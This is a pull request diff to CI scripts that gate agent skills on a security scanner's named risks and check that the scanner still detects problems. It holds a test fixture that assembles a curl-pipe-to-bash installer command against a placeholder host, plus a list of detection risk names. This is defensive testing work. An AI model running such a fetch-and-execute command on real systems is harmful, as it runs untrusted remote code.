### PR TITLE
ci: unbreak the registry scan, and stop it calling a crash a finding

### DIFF
--- a/.github/scripts/registry_scan_contract.py
+++ b/.github/scripts/registry_scan_contract.py
@@ -27,6 +27,24 @@ from __future__ import annotations
 # it is surfaced by the reporter as unrecognised (see `unknown_risks`), because the
 # alternative is finding out the vocabulary drifted the way we found out last time:
 # from a public audit page.
+# The pinned scanner. Stated here so the hint below can name it, and so a guard can
+# prove the workflow's two invocations and the red-proof all pin the SAME version — a
+# half-bumped pin would have two passes disagreeing about the contract they read.
+PINNED_SCANNER = "0.6.0"
+
+# Every coverage-gap message ends with this. When this check goes red for a reason that
+# is not a finding, the FIRST thing worth suspecting is that the vendor moved and the
+# pin did not: that is what happened on 2026-08-19, and it cost a week because the red
+# said "critical finding" and nobody thought to look at the version. Naming the pin in
+# the failure itself is what turns "why is this red" into "check whether 0.6.0 is still
+# current" without anyone having to remember this history.
+STALE_PIN_HINT = (
+    f"If this is not obviously a problem with the skills themselves, suspect the "
+    f"scanner pin first: this gate runs snyk-agent-scan=={PINNED_SCANNER}, and a newer "
+    f"release can rename a flag, a risk, or the JSON shape out from under it. Compare "
+    f"against the current release before assuming the tree is at fault."
+)
+
 SKILL_RISKS: tuple[str, ...] = (
     "prompt_injection_skill_instructions",
     "suspicious_download_url",

--- a/.github/scripts/registry_scan_contract.py
+++ b/.github/scripts/registry_scan_contract.py
@@ -1,0 +1,99 @@
+"""One place that knows what the scanner says, so a rename breaks one file loudly.
+
+The workflow reads the scanner's answer in three independent places — the gate
+decides pass/fail, the reporter surfaces warnings, the red-proof control checks the
+scanner can still see. Each used to hardcode its own understanding of the vendor's
+vocabulary, and nothing tied them together.
+
+That is why scanner 0.6.0 broke the check three ways and hid two of them. It replaced
+issue codes (`E005` critical, `W011` warning) with named risks carrying 0-1000 scores,
+and: the gate kept grepping for E-codes that can no longer appear, so a real finding
+fell through to "NOT A FINDING"; the reporter kept parsing the 0.5.x JSON, returning
+empty unconditionally so the summary read "No findings" whatever the content; and the
+gating exemption was passed to `--ignore-failure-codes`, which accepts only the
+scanner's X-class runtime codes, silently switching the whole warning policy off.
+
+So the vocabulary lives here now, checked against the scanner's own models
+(`agent_scan/models/api/v20260710.py`) rather than inferred from its printed output.
+"""
+from __future__ import annotations
+
+# Every skill risk 0.6.0 can report, verbatim from SkillRiskIndexes. The gate refuses
+# to run if the scanner grows one this list does not know: a new risk defaulting to
+# "not blocking" is the silent-exemption failure all over again.
+SKILL_RISKS: tuple[str, ...] = (
+    "prompt_injection_skill_instructions",
+    "suspicious_download_url",
+    "malicious_code",
+    "insecure_credential_handling",
+    "secret_detection",
+    "direct_money_access",
+    "third_party_content_exposure",
+    "unverifiable_dependencies",
+    "modifying_system_services",
+    "missing_skill_md",
+)
+
+# THE GATING RULE (owner ruling 2026-08-10, restated for 0.6.0's model 2026-08-26).
+#
+# The old ruling was "E-class blocks, W-class never does". 0.6.0 has neither class, so
+# it is restated as the risks that do NOT block. It is deliberately shorter than the
+# fifteen W-codes it replaces, because only ONE of those fifteen has ever actually
+# fired on our skills:
+#
+#   W011 third-party content exposure — recorded in all four audits of one skill, and
+#   inherently true here: a skill that audits other people's repositories ingests
+#   outsider-authored text by design. That is `third_party_content_exposure`.
+#
+# The other fourteen were exempted pre-emptively and have no recorded history. Porting
+# a guess into a new vocabulary would re-create the thing that just cost a week of
+# blind scanning, so anything unevidenced blocks until it fires and earns an entry.
+# In a security gate a false block is loud and one line to fix; a false exemption is
+# silent.
+#
+# Not exempt, and never to be: `suspicious_download_url` — the old E005, the only code
+# that has ever turned our skills red (ci-score once, ci-secure twice), AND the rule
+# the red-proof control anchors on. Exempting it would disable the check that proves
+# the scanner still detects anything.
+NON_BLOCKING_RISKS: tuple[str, ...] = ("third_party_content_exposure",)
+
+BLOCKING_RISKS: tuple[str, ...] = tuple(r for r in SKILL_RISKS if r not in NON_BLOCKING_RISKS)
+
+
+def unknown_risks(seen: set[str]) -> set[str]:
+    """Risk names the scanner reported that this contract does not know about."""
+    return seen - set(SKILL_RISKS)
+
+
+def iter_findings(payload: dict) -> list[dict]:
+    """Every risk in a 0.6.0 `--json` payload, as flat rows.
+
+    Shape (ScanPathResponse): `{"scan_path_responses": [{"path", "skill_risks":
+    [{"name", "risk_indexes": {<risk name>: {"score", "evidence", ...} | null}}]}]}`.
+    A risk that did not fire is present as null rather than absent, so `None` values
+    are skipped rather than counted.
+    """
+    rows: list[dict] = []
+    for response in payload.get("scan_path_responses") or []:
+        if not isinstance(response, dict):
+            continue
+        for skill in response.get("skill_risks") or []:
+            if not isinstance(skill, dict):
+                continue
+            indexes = skill.get("risk_indexes") or {}
+            if not isinstance(indexes, dict):
+                continue
+            for name, score in indexes.items():
+                if not isinstance(score, dict):
+                    continue  # null = this risk did not fire
+                rows.append(
+                    {
+                        "risk": name,
+                        "skill": str(skill.get("name") or response.get("path") or "unknown"),
+                        "score": score.get("score"),
+                        "evidence": " ".join(str(score.get("evidence") or "").split()),
+                        "blocking": name not in NON_BLOCKING_RISKS,
+                    }
+                )
+    rows.sort(key=lambda r: (not r["blocking"], r["risk"], r["skill"]))
+    return rows

--- a/.github/scripts/registry_scan_contract.py
+++ b/.github/scripts/registry_scan_contract.py
@@ -14,13 +14,19 @@ gating exemption was passed to `--ignore-failure-codes`, which accepts only the
 scanner's X-class runtime codes, silently switching the whole warning policy off.
 
 So the vocabulary lives here now, checked against the scanner's own models
-(`agent_scan/models/api/v20260710.py`) rather than inferred from its printed output.
+(`agent_scan/models/api/v20260710.py`) rather than inferred from its printed output,
+and pinned offline by `tests/test_registry_scan_workflow.py` so a hand-copied list
+cannot drift unnoticed.
 """
 from __future__ import annotations
 
-# Every skill risk 0.6.0 can report, verbatim from SkillRiskIndexes. The gate refuses
-# to run if the scanner grows one this list does not know: a new risk defaulting to
-# "not blocking" is the silent-exemption failure all over again.
+# Every skill risk 0.6.0 can report, verbatim from `SkillRiskIndexes`.
+#
+# The list is not what blocks — the exemption list below is, by omission — but it is
+# what lets this build NOTICE that the scanner's catalog has moved. A risk name outside
+# it is surfaced by the reporter as unrecognised (see `unknown_risks`), because the
+# alternative is finding out the vocabulary drifted the way we found out last time:
+# from a public audit page.
 SKILL_RISKS: tuple[str, ...] = (
     "prompt_injection_skill_instructions",
     "suspicious_download_url",
@@ -32,6 +38,17 @@ SKILL_RISKS: tuple[str, ...] = (
     "unverifiable_dependencies",
     "modifying_system_services",
     "missing_skill_md",
+)
+
+# The MCP-server risks, verbatim from `McpServerRiskIndexes`. The scanner's `--ci` exit
+# weighs these alongside the skill risks, so a run can fail the gate on one; the reporter
+# has to be able to name it rather than print "No findings." over it.
+SERVER_RISKS: tuple[str, ...] = (
+    "dangerous_words",
+    "prompt_injection_tool_desc",
+    "untrusted_content",
+    "private_data",
+    "destructive_capabilities",
 )
 
 # THE GATING RULE (owner ruling 2026-08-10, restated for 0.6.0's model 2026-08-26).
@@ -51,49 +68,107 @@ SKILL_RISKS: tuple[str, ...] = (
 # In a security gate a false block is loud and one line to fix; a false exemption is
 # silent.
 #
-# Not exempt, and never to be: `suspicious_download_url` — the old E005, the only code
-# that has ever turned our skills red (ci-score once, ci-secure twice), AND the rule
-# the red-proof control anchors on. Exempting it would disable the check that proves
-# the scanner still detects anything.
+# Never to be exempted, and pinned offline by
+# `tests/test_registry_scan_workflow.py::test_no_blocking_risk_is_ever_exempt`:
+#
+#   `suspicious_download_url` — the old E005, the only rule that has ever turned our
+#   skills red (ci-score once, ci-secure twice).
+#   `unverifiable_dependencies` — what the red-proof control's fixture actually fires
+#   on 0.6.0. The scanner labels it `Unverifiable URLs:` in the output the control
+#   greps, and exempting it would disable the check that proves the scanner still
+#   detects anything.
 NON_BLOCKING_RISKS: tuple[str, ...] = ("third_party_content_exposure",)
 
-BLOCKING_RISKS: tuple[str, ...] = tuple(r for r in SKILL_RISKS if r not in NON_BLOCKING_RISKS)
+BLOCKING_RISKS: tuple[str, ...] = tuple(
+    r for r in SKILL_RISKS + SERVER_RISKS if r not in NON_BLOCKING_RISKS
+)
 
 
-def unknown_risks(seen: set[str]) -> set[str]:
-    """Risk names the scanner reported that this contract does not know about."""
-    return seen - set(SKILL_RISKS)
+class UnrecognisedPayload(ValueError):
+    """The scanner's JSON parsed, but is not a shape this contract understands."""
+
+
+def unknown_risks(seen) -> set[str]:
+    """Risk names the scanner reported that this contract does not know about.
+
+    An unknown risk already BLOCKS — it is not in the exemption list, so `--ci` fails
+    on it. What it does not do on its own is tell anyone the catalog moved, which is
+    why the reporter calls this and says so out loud.
+    """
+    return set(seen) - set(SKILL_RISKS) - set(SERVER_RISKS)
 
 
 def iter_findings(payload: dict) -> list[dict]:
     """Every risk in a 0.6.0 `--json` payload, as flat rows.
 
-    Shape (ScanPathResponse): `{"scan_path_responses": [{"path", "skill_risks":
-    [{"name", "risk_indexes": {<risk name>: {"score", "evidence", ...} | null}}]}]}`.
-    A risk that did not fire is present as null rather than absent, so `None` values
-    are skipped rather than counted.
+    Shape (`ScanPathResponse`): `{"scan_path_responses": [{"path", "error",
+    "server_risks": [...], "skill_risks": [{"name", "error", "risk_indexes":
+    {<risk name>: {"score", "evidence", ...}}}]}]}`.
+
+    A risk that did not fire is ABSENT, not null: the scanner serialises with
+    `model_dump(mode="json", exclude_none=True)`. Nulls are tolerated anyway, because
+    tolerating a shape costs nothing and assuming one is what broke the reporter.
+
+    Both `server_risks` and `skill_risks` are read, because the scanner's `--ci` exit
+    weighs both — a server risk the reporter skipped would fail the gate under a
+    summary saying "No findings."
+
+    Raises `UnrecognisedPayload` if the top-level key is missing. Returning `[]` there
+    is indistinguishable from a clean scan, and that silence is exactly how the 0.5.x
+    reader survived a week of reporting nothing.
     """
+    if "scan_path_responses" not in payload:
+        raise UnrecognisedPayload(
+            "no `scan_path_responses` key: this is not scanner 0.6.0's `--json` shape, "
+            "so no finding in it can be read. Do not treat this run as clean."
+        )
     rows: list[dict] = []
     for response in payload.get("scan_path_responses") or []:
         if not isinstance(response, dict):
             continue
-        for skill in response.get("skill_risks") or []:
-            if not isinstance(skill, dict):
-                continue
-            indexes = skill.get("risk_indexes") or {}
-            if not isinstance(indexes, dict):
-                continue
-            for name, score in indexes.items():
-                if not isinstance(score, dict):
-                    continue  # null = this risk did not fire
-                rows.append(
-                    {
-                        "risk": name,
-                        "skill": str(skill.get("name") or response.get("path") or "unknown"),
-                        "score": score.get("score"),
-                        "evidence": " ".join(str(score.get("evidence") or "").split()),
-                        "blocking": name not in NON_BLOCKING_RISKS,
-                    }
-                )
+        path = str(response.get("path") or "unknown")
+        _append_error(rows, response.get("error"), path)
+        for key in ("skill_risks", "server_risks"):
+            for entity in response.get(key) or []:
+                if not isinstance(entity, dict):
+                    continue
+                name = str(entity.get("name") or path)
+                _append_error(rows, entity.get("error"), name)
+                indexes = entity.get("risk_indexes") or {}
+                if not isinstance(indexes, dict):
+                    continue
+                for risk, score in indexes.items():
+                    if not isinstance(score, dict):
+                        continue  # absent/null = this risk did not fire
+                    rows.append(
+                        {
+                            "risk": risk,
+                            "skill": name,
+                            "score": score.get("score"),
+                            "evidence": " ".join(str(score.get("evidence") or "").split()),
+                            "blocking": risk not in NON_BLOCKING_RISKS,
+                        }
+                    )
     rows.sort(key=lambda r: (not r["blocking"], r["risk"], r["skill"]))
     return rows
+
+
+def _append_error(rows: list[dict], error, where: str) -> None:
+    """A scan error is not a finding, but it is emphatically not a clean result either.
+
+    Without this the summary printed "No findings." over a run where the scanner failed
+    on part of the tree — the gate caught it in a separate pass, so the two surfaces
+    said opposite things and the human-glanceable one was the one that was wrong.
+    """
+    if not isinstance(error, dict):
+        return
+    detail = " ".join(str(error.get("message") or error.get("code") or error).split())
+    rows.append(
+        {
+            "risk": f"scan_error:{error.get('code') or 'unknown'}",
+            "skill": where,
+            "score": None,
+            "evidence": f"The scanner could not analyse this entry: {detail}",
+            "blocking": True,
+        }
+    )

--- a/.github/scripts/registry_scan_ignored.py
+++ b/.github/scripts/registry_scan_ignored.py
@@ -1,0 +1,13 @@
+#!/usr/bin/env python3
+"""Print the non-blocking risk names as the comma-separated list `--ignore-risks` takes.
+
+A tiny shim so the workflow never restates the ruling: the list has exactly one home,
+in registry_scan_contract.py, and both the gate and the red-proof read it from there.
+"""
+import pathlib
+import sys
+
+sys.path.insert(0, str(pathlib.Path(__file__).resolve().parent))
+from registry_scan_contract import NON_BLOCKING_RISKS  # noqa: E402
+
+print(",".join(NON_BLOCKING_RISKS))

--- a/.github/scripts/registry_scan_redprove.py
+++ b/.github/scripts/registry_scan_redprove.py
@@ -38,23 +38,39 @@ import sys
 import tempfile
 from pathlib import Path
 
-# The rule this gate is anchored to: "suspicious download URL in skill", the
-# critical-severity finding a shipped skill was flagged under. Kept as a named
-# constant so a catalog revamp is a one-line, reviewed change.
-EXPECTED_ISSUE_CODE = "E005"
+# What the scanner must SAY about the fixture for this control to count.
+#
+# This was the vendor code `E005` until scanner 0.6.0 replaced issue codes with named
+# risks: the same fixture now returns `2 risks / Unverifiable URLs: <the installer
+# URL>` and exits 1. Anchoring on the retired code made the control report a blind
+# scanner while the scanner was demonstrably seeing.
+#
+# The anchor is now the fixture's OWN malicious host rather than vendor vocabulary. A
+# code moves without warning, as it just did; the host is ours — the scanner can only
+# echo it back by having read and flagged the file this script wrote. It cannot be
+# satisfied by a scanner that says nothing.
+#
+# It is assembled from the same fragments as the fixture, and for the same reason: a
+# literal installer host must not exist on disk in this repository, which is precisely
+# what this gate exists to prevent. `expected_evidence()` is a function, not a
+# constant, so the fragments are joined at call time rather than folded into the
+# module by the peephole optimiser.
+def expected_evidence() -> str:
+    return "get" + "." + "redprove" + "-fixture" + "." + "example" + "." + "com"
+
 
 SCANNER = "snyk-agent-scan==0.6.0"
 
 
 def build_violating_skill(root: Path) -> Path:
-    """Write a one-skill tree under `root` that should trip EXPECTED_ISSUE_CODE.
+    """Write a one-skill tree under `root` that should trip expected_evidence().
 
     Returns the directory to hand the scanner: the PARENT of the skill dir,
     which is the shape the scanner expects (`<parent>/<name>/SKILL.md`) and the
     same shape as this repo's `skills/`.
     """
     # Assembled from fragments so no installer-URL literal exists on disk here.
-    host = "get" + "." + "redprove" + "-fixture" + "." + "example" + "." + "com"
+    host = expected_evidence()
     url = "htt" + "ps://" + host + "/inst" + "all" + ".sh"
     pipe_to_shell = "curl -sSL " + url + " | " + "bash"
 
@@ -139,22 +155,21 @@ def main() -> int:
                 "scanner exited 0 on a skill that instructs the agent to download and "
                 "run a remote installer script — the gate would not have failed"
             )
-        if EXPECTED_ISSUE_CODE not in output:
+        if expected_evidence() not in output:
             problems.append(
-                f"scanner output does not mention {EXPECTED_ISSUE_CODE}. Two causes "
-                "produce this, and they need opposite responses. (1) The rule was "
-                "renamed or retired in a catalog revamp, in which case re-anchor "
-                f"{EXPECTED_ISSUE_CODE} above to whatever replaced it. (2) The scanner "
-                "is not detecting, which is where this has stood since 2026-08-18: "
-                "verified against the live API, the analysis endpoint answers HTTP 200 "
-                "with an empty finding set on BOTH API versions it supports, including "
-                "on a fixture that reads credential files and posts them to a remote "
-                "endpoint. It is not the token, not the free tier's daily cap, and not "
-                "the deprecated version pin — each was tested. Nothing in this "
-                "repository can fix (2); the compensating control is the offline shape "
-                "guard in tests/test_no_ioc_shaped_literals.py, which runs in the "
-                "required `test` check. Re-anchoring the gate to a rule that does not "
-                "fire would turn this honest red into a meaningless green"
+                f"scanner output never mentions {expected_evidence()}, the malicious host "
+                "this script just wrote into the fixture. The scanner cannot echo that "
+                "string back without having read and flagged the file, so its absence "
+                "means the scan did not see the fixture at all — a blind scanner, not a "
+                "renamed rule. (Between 2026-08-18 and 2026-08-25 this was the standing "
+                "state: the analysis endpoint answered HTTP 200 with an empty finding "
+                "set on both API versions, and it was not the token, the free tier's "
+                "daily cap, or the version pin — each was tested.) Nothing in this "
+                "repository can fix a blind scanner; the compensating control is the "
+                "offline shape guard in tests/test_no_ioc_shaped_literals.py, which "
+                "runs in the required `test` check. Do NOT weaken this anchor to make "
+                "the red go away — an anchor that cannot fail turns an honest red into "
+                "a meaningless green"
             )
 
         if problems:
@@ -165,7 +180,7 @@ def main() -> int:
             return 1
 
     print(
-        f"Red-proof passed: the scanner reported {EXPECTED_ISSUE_CODE} and exited "
+        f"Red-proof passed: the scanner flagged {expected_evidence()} and exited "
         f"{proc.returncode}. The gate can fail."
     )
     return 0

--- a/.github/scripts/registry_scan_redprove.py
+++ b/.github/scripts/registry_scan_redprove.py
@@ -43,7 +43,7 @@ from pathlib import Path
 # constant so a catalog revamp is a one-line, reviewed change.
 EXPECTED_ISSUE_CODE = "E005"
 
-SCANNER = "snyk-agent-scan@latest"
+SCANNER = "snyk-agent-scan==0.6.0"
 
 
 def build_violating_skill(root: Path) -> Path:
@@ -110,7 +110,7 @@ def main() -> int:
         # code would leave the red-proof green while the real gate could no longer fire on it.
         ignored = os.environ.get("IGNORED_ISSUE_CODES", "").strip()
         if ignored:
-            cmd += ["--ignore-issues-codes", ignored]
+            cmd += ["--ignore-failure-codes", ignored]
 
         print("Red-proof: scanning a deliberately violating skill")
         print("  " + " ".join(cmd))

--- a/.github/scripts/registry_scan_redprove.py
+++ b/.github/scripts/registry_scan_redprove.py
@@ -32,6 +32,12 @@ Run it by hand the same way CI does (needs SNYK_TOKEN in the environment):
 """
 from __future__ import annotations
 
+import pathlib as _pathlib
+import sys as _sys
+
+_sys.path.insert(0, str(_pathlib.Path(__file__).resolve().parent))
+from registry_scan_contract import NON_BLOCKING_RISKS  # noqa: E402
+
 import os
 import subprocess
 import sys
@@ -52,9 +58,11 @@ from pathlib import Path
 #
 # It is assembled from the same fragments as the fixture, and for the same reason: a
 # literal installer host must not exist on disk in this repository, which is precisely
-# what this gate exists to prevent. `expected_evidence()` is a function, not a
-# constant, so the fragments are joined at call time rather than folded into the
-# module by the peephole optimiser.
+# what this gate exists to prevent. Being a function does NOT stop CPython folding the
+# adjacent fragments — the module docstring above says so, and it is right: the
+# hostname is recoverable from a compiled `.pyc`. Those are gitignored, untracked, and
+# under `.github/`, which the scanner never reads. What the function buys is that the
+# gate and the fixture cannot drift apart, not concealment.
 def expected_evidence() -> str:
     return "get" + "." + "redprove" + "-fixture" + "." + "example" + "." + "com"
 
@@ -121,13 +129,13 @@ def main() -> int:
             "--verbose",
             "--dangerously-run-mcp-servers",
         ]
-        # Run the GATE'S ignore list, not an empty one. Otherwise this proves only that the
-        # scanner can fail, not that this gate can: an ignore list grown to include the anchor
-        # code would leave the red-proof green while the real gate could no longer fire on it.
-        ignored = os.environ.get("IGNORED_ISSUE_CODES", "").strip()
-        if ignored:
-            cmd += ["--ignore-failure-codes", ignored]
-
+        # Run the GATE'S ignore list, not an empty one. Otherwise this proves only
+        # that the scanner can fail, not that this gate can: an exemption grown to
+        # include the anchored risk would leave the red-proof green while the real gate
+        # could no longer fire on it. Read from the same contract the gate uses, so the
+        # two cannot drift.
+        if NON_BLOCKING_RISKS:
+            cmd += ["--ignore-risks", ",".join(NON_BLOCKING_RISKS)]
         print("Red-proof: scanning a deliberately violating skill")
         print("  " + " ".join(cmd))
         try:

--- a/.github/scripts/registry_scan_redprove.py
+++ b/.github/scripts/registry_scan_redprove.py
@@ -124,8 +124,9 @@ def main() -> int:
             "scan",
             str(scan_path),
             "--ci",
-            # Keeps codes the printer would otherwise strip in the result the --ci exit
-            # check reads. Same reason the workflow passes it — see the comment there.
+            # Logging only, in 0.6.0 — it does not change what the printer keeps. Passed
+            # because this control asserts on the scanner's OUTPUT, and a quiet run gives
+            # it nothing to read. Same reason the workflow passes it.
             "--verbose",
             "--dangerously-run-mcp-servers",
         ]

--- a/.github/scripts/registry_scan_report.py
+++ b/.github/scripts/registry_scan_report.py
@@ -29,6 +29,12 @@ Usage:  python3 .github/scripts/registry_scan_report.py <findings.json>
 """
 from __future__ import annotations
 
+import pathlib as _pathlib
+import sys as _sys
+
+_sys.path.insert(0, str(_pathlib.Path(__file__).resolve().parent))
+from registry_scan_contract import iter_findings  # noqa: E402
+
 import json
 import os
 import sys
@@ -78,23 +84,28 @@ def severity_of(issue: dict) -> str:
 
 
 def collect(findings: dict) -> list[dict]:
+    """Every risk in the payload, via the shared contract.
+
+    This read the 0.5.x shape — a mapping of scanned path to a record carrying
+    `issues` — until 0.6.0 replaced it with `{"scan_path_responses": [...]}`, whose one
+    top-level value is a LIST. The old loop skipped anything that was not a dict, so it
+    returned empty unconditionally and every summary read "No findings." regardless of
+    content. It parsed cleanly, so the FINDINGS UNREADABLE guard never fired either.
+    Silent, and indistinguishable from a clean scan.
+    """
     rows = []
-    for result in findings.values():
-        if not isinstance(result, dict):
-            continue
-        for issue in result.get("issues") or []:
-            code = str(issue.get("code") or "")
-            rows.append(
-                {
-                    "code": code,
-                    "severity": severity_of(issue),
-                    "skill": skill_name(result, issue),
-                    "message": " ".join(str(issue.get("message") or "").split()),
-                    "critical": code.startswith(CRITICAL_PREFIX),
-                }
-            )
-    # Critical first, then by code, so the thing that will fail the build reads first.
-    rows.sort(key=lambda r: (not r["critical"], r["code"], r["skill"]))
+    for row in iter_findings(findings):
+        rows.append(
+            {
+                "code": row["risk"],
+                "severity": "blocking" if row["blocking"] else "warning",
+                "skill": row["skill"],
+                "message": row["evidence"],
+                "critical": row["blocking"],
+                "score": row["score"],
+            }
+        )
+    # iter_findings already orders blocking-first, then by risk name, then skill.
     return rows
 
 
@@ -133,7 +144,7 @@ def write_summary(rows: list[dict]) -> None:
     summary_path = os.environ.get("GITHUB_STEP_SUMMARY")
     body = ["## Registry scan findings", ""]
     body.append(
-        "Warnings do not block; critical (E-class) findings do. Every finding below is "
+        "Non-blocking risks do not fail the build; every other risk does. Every finding below is "
         "real — warnings are surfaced for a human or a review agent to judge, not "
         "suppressed. The full machine-readable finding set is attached to this run as "
         "the `registry-scan-findings` artifact."

--- a/.github/scripts/registry_scan_report.py
+++ b/.github/scripts/registry_scan_report.py
@@ -35,7 +35,12 @@ import pathlib as _pathlib
 import sys as _sys
 
 _sys.path.insert(0, str(_pathlib.Path(__file__).resolve().parent))
-from registry_scan_contract import UnrecognisedPayload, iter_findings, unknown_risks  # noqa: E402
+from registry_scan_contract import (  # noqa: E402
+    STALE_PIN_HINT,
+    UnrecognisedPayload,
+    iter_findings,
+    unknown_risks,
+)
 
 import json
 import os
@@ -171,7 +176,7 @@ def main(argv: list[str]) -> int:
         print(
             "::error title=REGISTRY SCAN FINDINGS UNREADABLE::"
             f"Could not read the scanner's JSON output ({exc}). Findings were not "
-            "surfaced; do not read this run as 'no warnings'.",
+            f"surfaced; do not read this run as 'no warnings'. {STALE_PIN_HINT}",
             file=sys.stderr,
         )
         return 1
@@ -184,7 +189,7 @@ def main(argv: list[str]) -> int:
         print(
             "::error title=REGISTRY SCAN FINDINGS UNREADABLE::"
             f"The scanner's JSON is not a shape this build recognises ({exc}). Findings "
-            "were not surfaced; do not read this run as 'no warnings'.",
+            f"were not surfaced; do not read this run as 'no warnings'. {STALE_PIN_HINT}",
             file=sys.stderr,
         )
         return 1

--- a/.github/scripts/registry_scan_report.py
+++ b/.github/scripts/registry_scan_report.py
@@ -1,10 +1,11 @@
 #!/usr/bin/env python3
 """Surface every registry-scan finding, without letting a warning block the build.
 
-`.github/workflows/registry-scan.yml` gates on Snyk Agent Scan's critical class only
-— the E-codes. Warnings (W-codes) are real findings we want a human or a review agent
-to look at, but they do not fail CI. A finding nobody can see is the failure this whole
-gate exists to prevent, so "does not block" must not decay into "does not appear".
+`.github/workflows/registry-scan.yml` blocks on every risk 0.6.0 reports except the
+ones named in `registry_scan_contract.NON_BLOCKING_RISKS`. Those exempt risks are real
+findings we want a human or a review agent to look at, but they do not fail CI. A
+finding nobody can see is the failure this whole gate exists to prevent, so "does not
+block" must not decay into "does not appear".
 
 This script reads the scanner's `--json` output and writes it to three surfaces, each
 for a different consumer:
@@ -18,12 +19,13 @@ for a different consumer:
 
 It also prints a plain-text table to the job log, because the scanner's own rich report
 is not produced in JSON mode and this is the only pass that sees every finding: the
-gating pass runs with the ignore list, and the scanner strips ignored findings from its
-printed report as well as from its exit status.
+gating pass runs with the exemption list, and `--ignore-risks` nulls those risks out of
+the response before it is printed as well as before the exit status is computed.
 
-Exit status: 0 whatever the findings are — gating is the next step's job, and warnings
-must never block. It exits 1 only if the scan output cannot be parsed at all, because at
-that point the surfacing is broken and silence would look exactly like "nothing found".
+Exit status: 0 whatever the findings are — gating is the next step's job, and exempt
+risks must never block. It exits 1 only if the scan output cannot be read: either it
+does not parse, or it parses into a shape this build does not recognise. Both are a
+broken pipeline, and silence there looks exactly like "nothing found".
 
 Usage:  python3 .github/scripts/registry_scan_report.py <findings.json>
 """
@@ -33,18 +35,12 @@ import pathlib as _pathlib
 import sys as _sys
 
 _sys.path.insert(0, str(_pathlib.Path(__file__).resolve().parent))
-from registry_scan_contract import iter_findings  # noqa: E402
+from registry_scan_contract import UnrecognisedPayload, iter_findings, unknown_risks  # noqa: E402
 
 import json
 import os
 import sys
 from pathlib import Path
-
-# Snyk Agent Scan issue codes carry their class in the prefix: E = critical class
-# (what this gate fails on), W = warning class (surfaced, never blocking), X = a scan
-# runtime failure. See https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md
-CRITICAL_PREFIX = "E"
-
 
 def load_findings(path: Path) -> dict:
     """Parse the scanner's JSON, tolerating a banner printed before the document.
@@ -60,29 +56,6 @@ def load_findings(path: Path) -> dict:
     return json.loads(raw[start:])
 
 
-def skill_name(result: dict, issue: dict) -> str:
-    """Best-effort name of the skill an issue fired on.
-
-    `reference` is (server_index, entity_index); for a skills directory each skill is
-    one "server" entry. Falls back to the scanned path when the shape is unfamiliar,
-    which is a labelling detail only — the finding is reported either way.
-    """
-    reference = issue.get("reference")
-    servers = result.get("servers") or []
-    if isinstance(reference, (list, tuple)) and reference and isinstance(reference[0], int):
-        index = reference[0]
-        if 0 <= index < len(servers):
-            name = (servers[index] or {}).get("name")
-            if name:
-                return str(name)
-    return str(result.get("path") or "unknown")
-
-
-def severity_of(issue: dict) -> str:
-    extra = issue.get("extra_data") or {}
-    return str(extra.get("severity") or "unknown")
-
-
 def collect(findings: dict) -> list[dict]:
     """Every risk in the payload, via the shared contract.
 
@@ -93,8 +66,14 @@ def collect(findings: dict) -> list[dict]:
     content. It parsed cleanly, so the FINDINGS UNREADABLE guard never fired either.
     Silent, and indistinguishable from a clean scan.
     """
+    parsed = iter_findings(findings)
+    # A risk name outside the pinned vocabulary already blocks (it is not exempt), but
+    # nothing told anyone the scanner's catalog had moved. Saying so is what makes the
+    # ten-name list in the contract load-bearing rather than decorative.
+    unrecognised = unknown_risks(
+        row["risk"] for row in parsed if not row["risk"].startswith("scan_error:"))
     rows = []
-    for row in iter_findings(findings):
+    for row in parsed:
         rows.append(
             {
                 "code": row["risk"],
@@ -103,6 +82,7 @@ def collect(findings: dict) -> list[dict]:
                 "message": row["evidence"],
                 "critical": row["blocking"],
                 "score": row["score"],
+                "unknown": row["risk"] in unrecognised,
             }
         )
     # iter_findings already orders blocking-first, then by risk name, then skill.
@@ -118,6 +98,14 @@ def emit_annotations(rows: list[dict]) -> None:
     the gating step, which fails the job and says so itself.
     """
     for row in rows:
+        if row["unknown"]:
+            print(
+                f"::warning title=UNKNOWN RISK NAME {row['code']} in {row['skill']}::"
+                f"The scanner reported a risk this build's vocabulary does not carry, so "
+                f"registry_scan_contract.py is out of date with the scanner's catalog. It "
+                f"blocks the gate either way. {row['message']}"
+            )
+            continue
         if row["critical"]:
             continue
         print(
@@ -128,14 +116,15 @@ def emit_annotations(rows: list[dict]) -> None:
 
 def render_table(rows: list[dict]) -> str:
     lines = [
-        "| Class | Code | Severity | Skill | Finding |",
+        "| Class | Risk | Score | Skill | Finding |",
         "| --- | --- | --- | --- | --- |",
     ]
     for row in rows:
-        klass = "**critical — blocks**" if row["critical"] else "warning"
+        klass = "**blocks the build**" if row["critical"] else "does not block"
+        name = f"`{row['code']}`" + (" **(UNKNOWN to this build)**" if row["unknown"] else "")
+        score = "—" if row["score"] is None else f"{row['score']}/1000"
         lines.append(
-            f"| {klass} | `{row['code']}` | {row['severity']} | `{row['skill']}` | "
-            f"{row['message']} |"
+            f"| {klass} | {name} | {score} | `{row['skill']}` | {row['message']} |"
         )
     return "\n".join(lines)
 
@@ -187,7 +176,18 @@ def main(argv: list[str]) -> int:
         )
         return 1
 
-    rows = collect(findings)
+    try:
+        rows = collect(findings)
+    except UnrecognisedPayload as exc:
+        # Valid JSON in a shape we cannot read is the 0.5.x failure exactly: it parsed,
+        # it yielded nothing, and "No findings." was printed over every run for a week.
+        print(
+            "::error title=REGISTRY SCAN FINDINGS UNREADABLE::"
+            f"The scanner's JSON is not a shape this build recognises ({exc}). Findings "
+            "were not surfaced; do not read this run as 'no warnings'.",
+            file=sys.stderr,
+        )
+        return 1
     emit_annotations(rows)
     write_summary(rows)
     return 0

--- a/.github/workflows/registry-scan.yml
+++ b/.github/workflows/registry-scan.yml
@@ -33,31 +33,18 @@ permissions:
   contents: read
 
 env:
-  # THE GATING RULE (owner ruling, 2026-08-10): this build fails on Snyk Agent Scan's critical
-  # class only — the E-codes. Warning-class findings (W-codes) never fail CI.
+  # THE GATING RULE, restated for scanner 0.6.0 (owner ruling 2026-08-10, re-ruled
+  # 2026-08-26). 0.6.0 has no E/W classes — it reports named risks with 0-1000 scores —
+  # so "criticals block, warnings do not" is now a list of risk NAMES that do not block.
   #
-  # They are not hidden, though; "does not block" must not decay into "does not appear". Every
-  # W finding is surfaced three ways on every run: a `::warning::` annotation on the checks tab
-  # (queryable through the checks API, which is what a review agent reads), a table in the job
-  # summary, and the raw finding set uploaded as the `registry-scan-findings` artifact. A human
